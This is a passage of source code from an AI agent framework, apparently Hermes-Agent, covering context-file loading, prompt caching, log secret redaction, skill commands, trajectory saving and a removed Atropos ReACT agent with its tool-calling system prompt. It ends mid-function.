marker = f"\n\n[...truncated {filename}: kept {head_chars}+{tail_chars} of {len(content)} chars. Use file tools to read the full file.]\n\n"
return head + marker + tail
def build_context_files_prompt(cwd: Optional[str] = None) -> str:
"""Discover and load context files for the system prompt.
Discovery: AGENTS.md (recursive), .cursorrules / .cursor/rules/*.mdc,
SOUL.md (cwd then ~/.hermes/ fallback). Each capped at 20,000 chars.
"""
if cwd is None:
cwd = os.getcwd()
cwd_path = Path(cwd).resolve()
sections = []
# AGENTS.md (hierarchical, recursive)
top_level_agents = None
for name in ["AGENTS.md", "agents.md"]:
candidate = cwd_path / name
if candidate.exists():
top_level_agents = candidate
break
if top_level_agents:
agents_files = []
for root, dirs, files in os.walk(cwd_path):
dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ('node_modules', '__pycache__', 'venv', '.venv')]
for f in files:
if f.lower() == "agents.md":
agents_files.append(Path(root) / f)
agents_files.sort(key=lambda p: len(p.parts))
total_agents_content = ""
for agents_path in agents_files:
try:
content = agents_path.read_text(encoding="utf-8").strip()
if content:
rel_path = agents_path.relative_to(cwd_path)
content = _scan_context_content(content, str(rel_path))
total_agents_content += f"## {rel_path}\n\n{content}\n\n"
except Exception as e:
logger.debug("Could not read %s: %s", agents_path, e)
if total_agents_content:
total_agents_content = _truncate_content(total_agents_content, "AGENTS.md")
sections.append(total_agents_content)
# .cursorrules
cursorrules_content = ""
cursorrules_file = cwd_path / ".cursorrules"
if cursorrules_file.exists():
try:
content = cursorrules_file.read_text(encoding="utf-8").strip()
if content:
content = _scan_context_content(content, ".cursorrules")
cursorrules_content += f"## .cursorrules\n\n{content}\n\n"
except Exception as e:
logger.debug("Could not read .cursorrules: %s", e)
cursor_rules_dir = cwd_path / ".cursor" / "rules"
if cursor_rules_dir.exists() and cursor_rules_dir.is_dir():
mdc_files = sorted(cursor_rules_dir.glob("*.mdc"))
for mdc_file in mdc_files:
try:
content = mdc_file.read_text(encoding="utf-8").strip()
if content:
content = _scan_context_content(content, f".cursor/rules/{mdc_file.name}")
cursorrules_content += f"## .cursor/rules/{mdc_file.name}\n\n{content}\n\n"
except Exception as e:
logger.debug("Could not read %s: %s", mdc_file, e)
if cursorrules_content:
cursorrules_content = _truncate_content(cursorrules_content, ".cursorrules")
sections.append(cursorrules_content)
# SOUL.md (cwd first, then ~/.hermes/ fallback)
soul_path = None
for name in ["SOUL.md", "soul.md"]:
candidate = cwd_path / name
if candidate.exists():
soul_path = candidate
break
if not soul_path:
global_soul = Path.home() / ".hermes" / "SOUL.md"
if global_soul.exists():
soul_path = global_soul
if soul_path:
try:
content = soul_path.read_text(encoding="utf-8").strip()
if content:
content = _scan_context_content(content, "SOUL.md")
content = _truncate_content(content, "SOUL.md")
sections.append(
f"## SOUL.md\n\nIf SOUL.md is present, embody its persona and tone. "
f"Avoid stiff, generic replies; follow its guidance unless higher-priority "
f"instructions override it.\n\n{content}"
)
except Exception as e:
logger.debug("Could not read SOUL.md from %s: %s", soul_path, e)
if not sections:
return ""
return "# Project Context\n\nThe following project context files have been loaded and should be followed:\n\n" + "\n".join(sections)

68
agent/prompt_caching.py Normal file
View File

@@ -0,0 +1,68 @@
"""Anthropic prompt caching (system_and_3 strategy).
Reduces input token costs by ~75% on multi-turn conversations by caching
the conversation prefix. Uses 4 cache_control breakpoints (Anthropic max):
1. System prompt (stable across all turns)
2-4. Last 3 non-system messages (rolling window)
Pure functions -- no class state, no AIAgent dependency.
"""
import copy
from typing import Any, Dict, List
def _apply_cache_marker(msg: dict, cache_marker: dict) -> None:
"""Add cache_control to a single message, handling all format variations."""
role = msg.get("role", "")
content = msg.get("content")
if role == "tool":
msg["cache_control"] = cache_marker
return
if content is None:
msg["cache_control"] = cache_marker
return
if isinstance(content, str):
msg["content"] = [{"type": "text", "text": content, "cache_control": cache_marker}]
return
if isinstance(content, list) and content:
last = content[-1]
if isinstance(last, dict):
last["cache_control"] = cache_marker
def apply_anthropic_cache_control(
api_messages: List[Dict[str, Any]],
cache_ttl: str = "5m",
) -> List[Dict[str, Any]]:
"""Apply system_and_3 caching strategy to messages for Anthropic models.
Places up to 4 cache_control breakpoints: system prompt + last 3 non-system messages.
Returns:
Deep copy of messages with cache_control breakpoints injected.
"""
messages = copy.deepcopy(api_messages)
if not messages:
return messages
marker = {"type": "ephemeral"}
if cache_ttl == "1h":
marker["ttl"] = "1h"
breakpoints_used = 0
if messages[0].get("role") == "system":
_apply_cache_marker(messages[0], marker)
breakpoints_used += 1
remaining = 4 - breakpoints_used
non_sys = [i for i in range(len(messages)) if messages[i].get("role") != "system"]
for idx in non_sys[-remaining:]:
_apply_cache_marker(messages[idx], marker)
return messages

161
agent/redact.py Normal file
View File

@@ -0,0 +1,161 @@
"""Regex-based secret redaction for logs and tool output.
Applies pattern matching to mask API keys, tokens, and credentials
before they reach log files, verbose output, or gateway logs.
Short tokens (< 18 chars) are fully masked. Longer tokens preserve
the first 6 and last 4 characters for debuggability.
"""
import logging
import os
import re
from typing import Optional
logger = logging.getLogger(__name__)
# Known API key prefixes -- match the prefix + contiguous token chars
_PREFIX_PATTERNS = [
r"sk-[A-Za-z0-9_-]{10,}", # OpenAI / OpenRouter / Anthropic (sk-ant-*)
r"ghp_[A-Za-z0-9]{10,}", # GitHub PAT (classic)
r"github_pat_[A-Za-z0-9_]{10,}", # GitHub PAT (fine-grained)
r"xox[baprs]-[A-Za-z0-9-]{10,}", # Slack tokens
r"AIza[A-Za-z0-9_-]{30,}", # Google API keys
r"pplx-[A-Za-z0-9]{10,}", # Perplexity
r"fal_[A-Za-z0-9_-]{10,}", # Fal.ai
r"fc-[A-Za-z0-9]{10,}", # Firecrawl
r"bb_live_[A-Za-z0-9_-]{10,}", # BrowserBase
r"gAAAA[A-Za-z0-9_=-]{20,}", # Codex encrypted tokens
r"AKIA[A-Z0-9]{16}", # AWS Access Key ID
r"sk_live_[A-Za-z0-9]{10,}", # Stripe secret key (live)
r"sk_test_[A-Za-z0-9]{10,}", # Stripe secret key (test)
r"rk_live_[A-Za-z0-9]{10,}", # Stripe restricted key
r"SG\.[A-Za-z0-9_-]{10,}", # SendGrid API key
r"hf_[A-Za-z0-9]{10,}", # HuggingFace token
r"r8_[A-Za-z0-9]{10,}", # Replicate API token
r"npm_[A-Za-z0-9]{10,}", # npm access token
r"pypi-[A-Za-z0-9_-]{10,}", # PyPI API token
r"dop_v1_[A-Za-z0-9]{10,}", # DigitalOcean PAT
r"doo_v1_[A-Za-z0-9]{10,}", # DigitalOcean OAuth
r"am_[A-Za-z0-9_-]{10,}", # AgentMail API key
]
# ENV assignment patterns: KEY=value where KEY contains a secret-like name
_SECRET_ENV_NAMES = r"(?:API_?KEY|TOKEN|SECRET|PASSWORD|PASSWD|CREDENTIAL|AUTH)"
_ENV_ASSIGN_RE = re.compile(
rf"([A-Z_]*{_SECRET_ENV_NAMES}[A-Z_]*)\s*=\s*(['\"]?)(\S+)\2",
re.IGNORECASE,
)
# JSON field patterns: "apiKey": "value", "token": "value", etc.
_JSON_KEY_NAMES = r"(?:api_?[Kk]ey|token|secret|password|access_token|refresh_token|auth_token|bearer)"
_JSON_FIELD_RE = re.compile(
rf'("{_JSON_KEY_NAMES}")\s*:\s*"([^"]+)"',
re.IGNORECASE,
)
# Authorization headers
_AUTH_HEADER_RE = re.compile(
r"(Authorization:\s*Bearer\s+)(\S+)",
re.IGNORECASE,
)
# Telegram bot tokens: bot<digits>:<token> or <digits>:<alphanum>
_TELEGRAM_RE = re.compile(
r"(bot)?(\d{8,}):([-A-Za-z0-9_]{30,})",
)
# Private key blocks: -----BEGIN RSA PRIVATE KEY----- ... -----END RSA PRIVATE KEY-----
_PRIVATE_KEY_RE = re.compile(
r"-----BEGIN[A-Z ]*PRIVATE KEY-----[\s\S]*?-----END[A-Z ]*PRIVATE KEY-----"
)
# Database connection strings: protocol://user:PASSWORD@host
# Catches postgres, mysql, mongodb, redis, amqp URLs and redacts the password
_DB_CONNSTR_RE = re.compile(
r"((?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?|redis|amqp)://[^:]+:)([^@]+)(@)",
re.IGNORECASE,
)
# E.164 phone numbers: +<country><number>, 7-15 digits
# Negative lookahead prevents matching hex strings or identifiers
_SIGNAL_PHONE_RE = re.compile(r"(\+[1-9]\d{6,14})(?![A-Za-z0-9])")
# Compile known prefix patterns into one alternation
_PREFIX_RE = re.compile(
r"(?<![A-Za-z0-9_-])(" + "|".join(_PREFIX_PATTERNS) + r")(?![A-Za-z0-9_-])"
)
def _mask_token(token: str) -> str:
"""Mask a token, preserving prefix for long tokens."""
if len(token) < 18:
return "***"
return f"{token[:6]}...{token[-4:]}"
def redact_sensitive_text(text: str) -> str:
"""Apply all redaction patterns to a block of text.
Safe to call on any string -- non-matching text passes through unchanged.
Disabled when security.redact_secrets is false in config.yaml.
"""
if not text:
return text
if os.getenv("HERMES_REDACT_SECRETS", "").lower() in ("0", "false", "no", "off"):
return text
# Known prefixes (sk-, ghp_, etc.)
text = _PREFIX_RE.sub(lambda m: _mask_token(m.group(1)), text)
# ENV assignments: OPENAI_API_KEY=sk-abc...
def _redact_env(m):
name, quote, value = m.group(1), m.group(2), m.group(3)
return f"{name}={quote}{_mask_token(value)}{quote}"
text = _ENV_ASSIGN_RE.sub(_redact_env, text)
# JSON fields: "apiKey": "value"
def _redact_json(m):
key, value = m.group(1), m.group(2)
return f'{key}: "{_mask_token(value)}"'
text = _JSON_FIELD_RE.sub(_redact_json, text)
# Authorization headers
text = _AUTH_HEADER_RE.sub(
lambda m: m.group(1) + _mask_token(m.group(2)),
text,
)
# Telegram bot tokens
def _redact_telegram(m):
prefix = m.group(1) or ""
digits = m.group(2)
return f"{prefix}{digits}:***"
text = _TELEGRAM_RE.sub(_redact_telegram, text)
# Private key blocks
text = _PRIVATE_KEY_RE.sub("[REDACTED PRIVATE KEY]", text)
# Database connection string passwords
text = _DB_CONNSTR_RE.sub(lambda m: f"{m.group(1)}***{m.group(3)}", text)
# E.164 phone numbers (Signal, WhatsApp)
def _redact_phone(m):
phone = m.group(1)
if len(phone) <= 8:
return phone[:2] + "****" + phone[-2:]
return phone[:4] + "****" + phone[-4:]
text = _SIGNAL_PHONE_RE.sub(_redact_phone, text)
return text
class RedactingFormatter(logging.Formatter):
"""Log formatter that redacts secrets from all log messages."""
def __init__(self, fmt=None, datefmt=None, style='%', **kwargs):
super().__init__(fmt, datefmt, style, **kwargs)
def format(self, record: logging.LogRecord) -> str:
original = super().format(record)
return redact_sensitive_text(original)

116
agent/skill_commands.py Normal file
View File

@@ -0,0 +1,116 @@
"""Skill slash commands — scan installed skills and build invocation messages.
Shared between CLI (cli.py) and gateway (gateway/run.py) so both surfaces
can invoke skills via /skill-name commands.
"""
import logging
from pathlib import Path
from typing import Any, Dict, Optional
logger = logging.getLogger(__name__)
_skill_commands: Dict[str, Dict[str, Any]] = {}
def scan_skill_commands() -> Dict[str, Dict[str, Any]]:
"""Scan ~/.hermes/skills/ and return a mapping of /command -> skill info.
Returns:
Dict mapping "/skill-name" to {name, description, skill_md_path, skill_dir}.
"""
global _skill_commands
_skill_commands = {}
try:
from tools.skills_tool import SKILLS_DIR, _parse_frontmatter, skill_matches_platform
if not SKILLS_DIR.exists():
return _skill_commands
for skill_md in SKILLS_DIR.rglob("SKILL.md"):
if any(part in ('.git', '.github', '.hub') for part in skill_md.parts):
continue
try:
content = skill_md.read_text(encoding='utf-8')
frontmatter, body = _parse_frontmatter(content)
# Skip skills incompatible with the current OS platform
if not skill_matches_platform(frontmatter):
continue
name = frontmatter.get('name', skill_md.parent.name)
description = frontmatter.get('description', '')
if not description:
for line in body.strip().split('\n'):
line = line.strip()
if line and not line.startswith('#'):
description = line[:80]
break
cmd_name = name.lower().replace(' ', '-').replace('_', '-')
_skill_commands[f"/{cmd_name}"] = {
"name": name,
"description": description or f"Invoke the {name} skill",
"skill_md_path": str(skill_md),
"skill_dir": str(skill_md.parent),
}
except Exception:
continue
except Exception:
pass
return _skill_commands
def get_skill_commands() -> Dict[str, Dict[str, Any]]:
"""Return the current skill commands mapping (scan first if empty)."""
if not _skill_commands:
scan_skill_commands()
return _skill_commands
def build_skill_invocation_message(cmd_key: str, user_instruction: str = "") -> Optional[str]:
"""Build the user message content for a skill slash command invocation.
Args:
cmd_key: The command key including leading slash (e.g., "/gif-search").
user_instruction: Optional text the user typed after the command.
Returns:
The formatted message string, or None if the skill wasn't found.
"""
commands = get_skill_commands()
skill_info = commands.get(cmd_key)
if not skill_info:
return None
skill_md_path = Path(skill_info["skill_md_path"])
skill_dir = Path(skill_info["skill_dir"])
skill_name = skill_info["name"]
try:
content = skill_md_path.read_text(encoding='utf-8')
except Exception:
return f"[Failed to load skill: {skill_name}]"
parts = [
f'[SYSTEM: The user has invoked the "{skill_name}" skill, indicating they want you to follow its instructions. The full skill content is loaded below.]',
"",
content.strip(),
]
supporting = []
for subdir in ("references", "templates", "scripts", "assets"):
subdir_path = skill_dir / subdir
if subdir_path.exists():
for f in sorted(subdir_path.rglob("*")):
if f.is_file():
rel = str(f.relative_to(skill_dir))
supporting.append(rel)
if supporting:
parts.append("")
parts.append("[This skill has supporting files you can load with the skill_view tool:]")
for sf in supporting:
parts.append(f"- {sf}")
parts.append(f'\nTo view any of these, use: skill_view(name="{skill_name}", file="<path>")')
if user_instruction:
parts.append("")
parts.append(f"The user has provided the following instruction alongside the skill invocation: {user_instruction}")
return "\n".join(parts)

56
agent/trajectory.py Normal file
View File

@@ -0,0 +1,56 @@
"""Trajectory saving utilities and static helpers.
_convert_to_trajectory_format stays as an AIAgent method (batch_runner.py
calls agent._convert_to_trajectory_format). Only the static helpers and
the file-write logic live here.
"""
import json
import logging
from datetime import datetime
from typing import Any, Dict, List
logger = logging.getLogger(__name__)
def convert_scratchpad_to_think(content: str) -> str:
"""Convert <REASONING_SCRATCHPAD> tags to <think> tags."""
if not content or "<REASONING_SCRATCHPAD>" not in content:
return content
return content.replace("<REASONING_SCRATCHPAD>", "<think>").replace("</REASONING_SCRATCHPAD>", "</think>")
def has_incomplete_scratchpad(content: str) -> bool:
"""Check if content has an opening <REASONING_SCRATCHPAD> without a closing tag."""
if not content:
return False
return "<REASONING_SCRATCHPAD>" in content and "</REASONING_SCRATCHPAD>" not in content
def save_trajectory(trajectory: List[Dict[str, Any]], model: str,
completed: bool, filename: str = None):
"""Append a trajectory entry to a JSONL file.
Args:
trajectory: The ShareGPT-format conversation list.
model: Model name for metadata.
completed: Whether the conversation completed successfully.
filename: Override output filename. Defaults to trajectory_samples.jsonl
or failed_trajectories.jsonl based on ``completed``.
"""
if filename is None:
filename = "trajectory_samples.jsonl" if completed else "failed_trajectories.jsonl"
entry = {
"conversations": trajectory,
"timestamp": datetime.now().isoformat(),
"model": model,
"completed": completed,
}
try:
with open(filename, "a", encoding="utf-8") as f:
f.write(json.dumps(entry, ensure_ascii=False) + "\n")
logger.info("Trajectory saved to %s", filename)
except Exception as e:
logger.warning("Failed to save trajectory: %s", e)

BIN
assets/banner.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 12 KiB

View File

@@ -1,41 +0,0 @@
# Dockerfile for atropos-agent sandbox server
# Runs inside Nomad containers to handle tool execution
# Includes bubblewrap for namespace-based slot isolation
FROM python:3.11-slim
# Install system dependencies
RUN apt-get update && apt-get install -y --no-install-recommends \
# Bubblewrap for namespace isolation
bubblewrap \
# `script` for PTY allocation (used for stable tmux+asciinema startup)
util-linux \
# Git for SWE-style tasks (cloning repos)
git \
# tmux for stateful terminal sessions (Phase 4.7+)
tmux \
# Common tools agents might need
curl \
wget \
jq \
# Cleanup
&& rm -rf /var/lib/apt/lists/*
# Install Python dependencies (sandbox server + optional terminal recording)
RUN pip install --no-cache-dir aiohttp asciinema
# Copy the sandbox server
COPY sandbox_server.py /app/sandbox_server.py
WORKDIR /app
# Create data directory for slot workspaces
RUN mkdir -p /data
# Verify bubblewrap is installed and working
RUN bwrap --version
EXPOSE 8080
# Default command - can be overridden by Nomad job spec
CMD ["python", "sandbox_server.py", "--port", "8080", "--slots", "10", "--data-dir", "/data"]

View File

@@ -1,47 +0,0 @@
"""
Atropos integration for Hermes-Agent.
This package is intentionally optional: Hermes-Agent should work without Atropos.
If you import anything from `atropos.*` without having `atroposlib` installed,
we raise a clear error with install instructions.
Install (recommended, from repo checkout):
uv sync --extra atropos
Or (pip / editable):
pip install -e '.[atropos]'
"""
from __future__ import annotations
def _require_atroposlib() -> None:
try:
import atroposlib # noqa: F401
except ModuleNotFoundError as exc: # pragma: no cover
raise ModuleNotFoundError(
"Hermes-Agent Atropos integration requires `atroposlib`, but it is not installed.\n"
"Install it with:\n"
" uv sync --extra atropos\n"
"or:\n"
" pip install -e '.[atropos]'\n"
) from exc
_require_atroposlib()
# Re-export the most commonly used pieces for convenience.
# Agent imports are eager (always available).
from .agent import AgentConfig, AgentResult, AgentStep, AtroposAgent, SequenceData # noqa: E402
# Env imports are lazy to avoid pulling in deleted atropos.tools dependencies.
# Use: from atropos.envs import AgentEnv, AgentEnvConfig (if needed)
__all__ = [
"AtroposAgent",
"AgentConfig",
"AgentResult",
"AgentStep",
"SequenceData",
]

View File

@@ -1,15 +0,0 @@
"""
Agent abstractions for atropos-agent.
Provides the core AtroposAgent class for running ReACT-style agent loops.
"""
from .atropos_agent import AgentConfig, AgentResult, AgentStep, AtroposAgent, SequenceData
__all__ = [
"AtroposAgent",
"AgentConfig",
"AgentResult",
"AgentStep",
"SequenceData",
]

View File

@@ -1,850 +0,0 @@
"""
ReACT-style agent implementation for atropos-agent.
This module provides the core AtroposAgent class that implements a basic
Reason-Act-Observe loop with tool calling capabilities.
Uses ManagedServer from atroposlib for automatic token/logprob tracking,
making trajectories ready for RL training.
The agent uses Hermes-style XML tags for tool calls:
- <think>...</think> for reasoning
- <tool_call>{"name": "...", "arguments": {...}}</tool_call> for actions
- <tool_response>...</tool_response> for observations
"""
import asyncio
import os
import json
import time
from contextlib import asynccontextmanager
from dataclasses import dataclass, field
from uuid import uuid4
from typing import Any, AsyncGenerator, Awaitable, Callable, Dict, List, Optional, Union
from dotenv import load_dotenv
import httpx
from ..tools import ToolCall, ToolRegistry, ToolResult
from atroposlib.envs.server_handling.managed_server import ManagedServer
load_dotenv()
# Default system prompt with tool calling instructions.
AGENT_SYSTEM_PROMPT = """You are a deep thinking AI. You MUST enclose your internal reasoning inside <think>...</think> tags.
You are a function calling AI model.
You are provided with function signatures within <tools></tools> XML tags.
You must call one or more functions to assist with the user query. Don't make assumptions about what values to plug into functions.
You can ONLY respond without a tool call if you are totally certain you have the final answer to the user's question or task
After calling & executing a function, you will be provided with function results within <tool_response></tool_response> XML tags.
Here are the available tools:
<tools>
{tools_json}
</tools>
Use the following JSON schema for each tool call you will make:
{"title": "FunctionCall", "type": "object", "properties": {"name": {"title": "Name", "type": "string"}, "arguments": {"title": "Arguments", "type": "object"}}, "required": ["name", "arguments"]}
## REQUIRED TOOL FORMAT
When you decide to call a tool, your assistant message MUST be:
1) exactly one <think>...</think> block, followed by
2) one or more <tool_call>...</tool_call> blocks,
and NOTHING else in that message.
If you need to explain anything, put it inside <think>. Do NOT write natural language outside <think> or <tool_call>.
For each function call return a JSON object with function name and arguments within <tool_call></tool_call> XML tags as follows:
<tool_call>
{"name": "<function-name>", "arguments": {"arg1": "value1"}}
</tool_call>
Each <tool_call> must be on its own and contain ONLY the JSON object (no extra text).
The JSON inside <tool_call> MUST be valid JSON with double quotes.
Do NOT output <tool_response> in an assistant message.
After you receive tool results, you may either call more tools (same required format) or provide the final answer.
When providing the final answer, do NOT include any <tool_call> blocks.
## TERMINAL TOOL NOTES
- Commands execute under POSIX `/bin/sh` (not bash).
- Each tool call runs in a fresh shell: environment changes (like `cd` or venv activation) do not persist across tool calls.
- Avoid bash-only features like `source`, `[[ ... ]]`, or process substitution.
- Prefer explicit venv usage:
- `python -m venv .venv && . .venv/bin/activate && python -m pip install -e .` (POSIX `.` activation), or
- `.venv/bin/python -m pip install -e .` (no activation required).
## ICL (examples)
User: Show the current directory.
Assistant:
<think>I should run pwd.</think>
<tool_call>
{"name": "terminal", "arguments": {"command": "pwd"}}
</tool_call>
User: <tool_response>{"success": true, "output": "/tmp\\n"}</tool_response>
Assistant: /tmp
User: List files, then count them.
Assistant:
<think>I should count files.</think>
<tool_call>
{"name": "terminal", "arguments": {"command": "ls -1 | wc -l"}}
</tool_call>
User: <tool_response>{"success": true, "output": "3\\n"}</tool_response>
Assistant: 3
User: Run pwd, then print ok (two tool calls).
Assistant:
<think>I should run two commands.</think>
<tool_call>
{"name": "terminal", "arguments": {"command": "pwd"}}
</tool_call>
<tool_call>
{"name": "terminal", "arguments": {"command": "echo ok"}}
</tool_call>
User: <tool_response>{"success": true, "output": "/tmp\\n"}</tool_response>
User: <tool_response>{"success": true, "output": "ok\\n"}</tool_response>
Assistant: ok
"""
@dataclass
class AgentConfig:
"""Configuration for the AtroposAgent."""
# Generation parameters
temperature: Optional[float] = 0.7
# Default to "let the backend decide" (important for tool-tag completions that may be longer).
max_tokens: Optional[int] = None
# Agent behavior
max_steps: int = 50
system_prompt: Optional[str] = None
tool_delay_s: float = 0.0
# Working directory for tools
working_dir: Optional[str] = None
@dataclass
class SequenceData:
"""Token/logprob data from a single completion."""
full_text: str
tokens: List[int]
masked_tokens: List[int] # -100 for prompt, actual IDs for completion
logprobs: List[float] # 1.0 for prompt, actual values for completion
metadata: Optional[Dict[str, Any]] = None
@classmethod
def from_sequence_node(cls, node) -> "SequenceData":
"""Create from a ManagedServer SequenceNode."""
return cls(
full_text=node.full_text,
tokens=node.tokens,
masked_tokens=node.masked_tokens,
logprobs=node.logprobs,
metadata=getattr(node, "metadata", None),
)
@dataclass
class AgentStep:
"""A single step in the agent's trajectory."""
step_number: int
assistant_message: str
tool_calls: List[ToolCall] = field(default_factory=list)
tool_results: List[ToolResult] = field(default_factory=list)
sequence_data: Optional[SequenceData] = None # Token data from this step
@property
def has_tool_calls(self) -> bool:
return len(self.tool_calls) > 0
@dataclass
class AgentResult:
"""Result of running an agent trajectory."""
success: bool
final_response: str
steps: List[AgentStep] = field(default_factory=list)
total_tokens: int = 0
error: Optional[str] = None
metadata: Dict[str, Any] = field(default_factory=dict)
# Full trajectory token data for RL training
trajectory_data: Optional[SequenceData] = None
@property
def num_steps(self) -> int:
return len(self.steps)
@property
def total_tool_calls(self) -> int:
return sum(len(step.tool_calls) for step in self.steps)
def to_messages(self) -> List[Dict[str, str]]:
"""Convert trajectory to messages format for logging."""
messages = []
for step in self.steps:
messages.append({"role": "assistant", "content": step.assistant_message})
if step.tool_results:
# Combine all tool responses
responses = "\n".join(r.to_xml() for r in step.tool_results)
messages.append({"role": "user", "content": responses})
return messages
def to_scored_data(self, score: float) -> Optional[Dict[str, Any]]:
"""
Convert to format suitable for ScoredDataGroup.
Args:
score: The score for this trajectory
Returns:
Dict with tokens, masks, scores suitable for training, or None if no data
"""
if self.trajectory_data is None:
return None
return {
"tokens": self.trajectory_data.tokens,
"masks": self.trajectory_data.masked_tokens,
"scores": score,
"logprobs": self.trajectory_data.logprobs,
}
class AtroposAgent:
"""
A ReACT-style agent that uses LLMs with tool calling.
This implementation wraps ManagedServer for automatic token/logprob tracking,
making trajectories ready for RL training.
Example:
# `server` may be an Atropos `ServerManager` (recommended) or a single `APIServer`.
# In practice, environments usually construct this via `BaseEnv`.
server = ...
tools = ToolRegistry()
tools.register(BashTool())
agent = AtroposAgent(server=server, tools=tools)
result = await agent.run("List the files in the current directory")
# Access token data for training
if result.trajectory_data:
print(f"Tokens: {result.trajectory_data.tokens}")
print(f"Masked: {result.trajectory_data.masked_tokens}")
"""
def __init__(
self,
server, # ServerManager or APIServer
tools: Optional[ToolRegistry] = None,
config: Optional[AgentConfig] = None,
tokenizer: Optional[Any] = None,
execute_tool: Optional[Callable[[ToolCall], Awaitable[ToolResult]]] = None,
):
self.server = server
self.tools = tools or ToolRegistry()
self.config = config or AgentConfig()
self.tokenizer = tokenizer or getattr(server, "tokenizer", None)
self.execute_tool = execute_tool or self.tools.execute
@asynccontextmanager
async def _managed(self) -> AsyncGenerator[Any, None]:
"""
Yield a ManagedServer-like object.
- If `self.server` is a ServerManager, use its `managed_server()` context manager.
- If `self.server` is a single APIServer, wrap it in `ManagedServer` directly.
"""
if os.getenv("ATROPOS_BYPASS_MANAGED_SERVER") == "1":
yield _DirectChatCompletionClient(server=self.server)
return
if hasattr(self.server, "managed_server"):
async with self.server.managed_server(tokenizer=self.tokenizer) as managed:
yield managed
else:
managed = ManagedServer(server=self.server, tokenizer=self.tokenizer)
try:
yield managed
finally:
managed.reset()
def _build_system_prompt(self) -> str:
"""Build the system prompt with tool descriptions."""
if self.config.system_prompt:
return self.config.system_prompt
tools_json = self.tools.get_prompt_tool_definitions_json()
# Avoid `str.format()` here because the prompt contains many literal `{}` braces
# in JSON examples; we only want to substitute the single `{tools_json}` token.
return AGENT_SYSTEM_PROMPT.replace("{tools_json}", tools_json)
def _infer_server_model_for_debug(self) -> Optional[str]:
"""
Best-effort inference of the configured model name for debug payload saving.
ManagedServer/server_manager typically injects `model` internally, so `chat_kwargs`
may not contain it. For replaying saved payloads via curl, it's useful to persist it.
"""
servers = getattr(self.server, "servers", None)
if isinstance(servers, list) and servers:
s0 = servers[0]
cfg = getattr(s0, "config", None)
model = getattr(cfg, "model_name", None) or getattr(s0, "model_name", None)
if isinstance(model, str) and model:
return model
model = getattr(self.server, "model_name", None) or getattr(self.server, "model", None)
if isinstance(model, str) and model:
return model
return None
def _infer_server_base_url_for_debug(self) -> Optional[str]:
"""
Best-effort inference of the configured base_url for debug logging.
This is helpful when diagnosing hangs / retries at the transport layer.
"""
servers = getattr(self.server, "servers", None)
if isinstance(servers, list) and servers:
s0 = servers[0]
cfg = getattr(s0, "config", None)
base_url = getattr(cfg, "base_url", None) or getattr(s0, "base_url", None)
if isinstance(base_url, str) and base_url:
return base_url
base_url = getattr(self.server, "base_url", None)
if isinstance(base_url, str) and base_url:
return base_url
return None
def _extract_response_metadata(self, response: Any) -> Dict[str, Any]:
"""
Extract lightweight, JSON-serializable metadata from an OpenAI-style response.
This is useful for debugging training runs, especially when ManagedServer state
tracking is unavailable (e.g. OpenAI-compatible chat endpoints).
"""
meta: Dict[str, Any] = {}
try:
rid = getattr(response, "id", None)
if isinstance(rid, str) and rid:
meta["id"] = rid
model = getattr(response, "model", None)
if isinstance(model, str) and model:
meta["model"] = model
created = getattr(response, "created", None)
if isinstance(created, int):
meta["created"] = created
system_fingerprint = getattr(response, "system_fingerprint", None)
if isinstance(system_fingerprint, str) and system_fingerprint:
meta["system_fingerprint"] = system_fingerprint
choices = getattr(response, "choices", None)
if isinstance(choices, list) and choices:
fr = getattr(choices[0], "finish_reason", None)
if isinstance(fr, str) and fr:
meta["finish_reason"] = fr
usage = getattr(response, "usage", None)
if usage is not None:
if hasattr(usage, "model_dump"):
meta["usage"] = usage.model_dump()
elif isinstance(usage, dict):
meta["usage"] = usage
except Exception:
pass
return meta
def _debug_dump_request(self, *, step_num: int, chat_kwargs: Dict[str, Any]) -> None:
if os.getenv("ATROPOS_DEBUG_AGENT_REQUEST") != "1":
return
try:
# Avoid dumping megabytes by default; messages can be huge.
meta = {
"step": step_num,
"base_url": self._infer_server_base_url_for_debug(),
"model": chat_kwargs.get("model") or self._infer_server_model_for_debug(),
"chat_kwargs_keys": sorted(list(chat_kwargs.keys())),
"n": chat_kwargs.get("n"),
"max_tokens": chat_kwargs.get("max_tokens"),
"temperature": chat_kwargs.get("temperature"),
"num_messages": len(chat_kwargs.get("messages") or []),
}
print("\n=== ATROPOS_DEBUG_AGENT_REQUEST ===", flush=True)
print(meta, flush=True)
if os.getenv("ATROPOS_DEBUG_AGENT_REQUEST_FULL") == "1":
payload = dict(chat_kwargs)
# Make the payload more legible and less huge.
try:
dumped = json.dumps(payload, ensure_ascii=False, indent=2)
except Exception:
dumped = repr(payload)
print("\n=== ATROPOS_DEBUG_AGENT_REQUEST_FULL ===", flush=True)
print(dumped[:200_000], flush=True)
# Optional: save the FULL request payload to disk (no truncation).
save_dir = os.getenv("ATROPOS_DEBUG_AGENT_REQUEST_SAVE_DIR")
if save_dir:
os.makedirs(save_dir, exist_ok=True)
payload: Dict[str, Any] = dict(chat_kwargs)
if "model" not in payload:
model = self._infer_server_model_for_debug()
if model:
payload["model"] = model
# Use a unique filename so parallel trajectories don't clobber each other.
fname = os.path.join(
save_dir,
f"atropos_agent_request_step{step_num}_{int(time.time()*1000)}_{os.getpid()}_{uuid4().hex}.json",
)
with open(fname, "w", encoding="utf-8") as f:
json.dump(payload, f, ensure_ascii=False, indent=2)
print(f"[AtroposAgent] saved request payload: {fname}", flush=True)
except Exception:
return
def _debug_dump_response(self, *, step_num: int, response: Any) -> None:
if os.getenv("ATROPOS_DEBUG_AGENT_RESPONSE") != "1":
return
print("\n=== ATROPOS_DEBUG_AGENT_RESPONSE ===", flush=True)
print({"step": step_num, "type": type(response).__name__}, flush=True)
try:
dumped = response.model_dump() # openai pydantic model
except Exception:
dumped = getattr(response, "__dict__", {"repr": repr(response)})
# Keep the dump bounded; we only need enough to see the assistant message content.
text = str(dumped)
print(text[:200_000], flush=True)
async def _chat_completion_with_debug(
self, *, managed: Any, step_num: int, chat_kwargs: Dict[str, Any]
) -> Any:
"""
Call `managed.chat_completion()` with optional timeout + richer failure logging.
Debug env vars:
- `ATROPOS_AGENT_CHAT_TIMEOUT_S`: if set, wraps the await in `asyncio.wait_for`.
- `ATROPOS_DEBUG_AGENT_WAIT_EVERY_S`: if set, prints a heartbeat while waiting.
"""
# Hard guardrail: never allow a single chat completion to block for too long.
